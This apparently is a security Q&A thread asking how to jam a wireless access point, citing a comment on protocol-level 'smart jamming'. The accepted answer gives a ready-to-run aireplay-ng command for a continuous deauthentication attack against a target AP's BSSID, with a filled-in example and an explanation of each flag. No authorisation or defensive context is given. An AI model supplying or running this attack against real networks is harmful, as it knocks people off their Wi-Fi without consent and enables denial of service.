# How to jam wireless AP?

Tags: attacks, wifi

The first comment under [this question](https://electronics.stackexchange.com/questions/83292/how-does-rf-anti-jam-technology-work?newsletter=1&nlcode=80056%7Cae35) states:

> There are "smart jammer" techniques that are designed to mess with the protocol operations, not overwhelm the receiver with noise (e.g., for 802.11, you can disobey inter-frame spacing rules and spoof RTS/CTS messages to make the channel look busy all the time). These techniques can use less energy and be less obvious to the victim. I'm not familiar enough with the field to know what countermeasures are used beyond normal nulling or canceling. 
>   –  Richard Hansen Sep 27 at 5:20

So how can this be done? `aircrack-ng` ? Other software? Is a laptop with master mode capable card sufficient?

Comment: Hi Vorac, did my answer resolve your question?

Comment: @ScottHelme, yes, basically this is what I was asking. Haven't tried it yet. Other methods are still wellcome.

Answer (score 3, accepted):

I'm not sure with regards to that specific method but you can use the aircrack-ng suite to launch a permanent deauth attack against an AP, effectively rendering it useless:

```
aireplay-ng -0 0 -a (bssid of target AP) (monitor interface)
```

This uses aireplay-ng to run a deauth attack `-0` continuously `0`, the `-a` specifies the target AP bssid and then you put the monitor interface on the end, usually `mon0`. The full command usually looks something like:

```
aireplay-ng -0 0 -a a4:2b:c2:23:a7:b2 mon0
```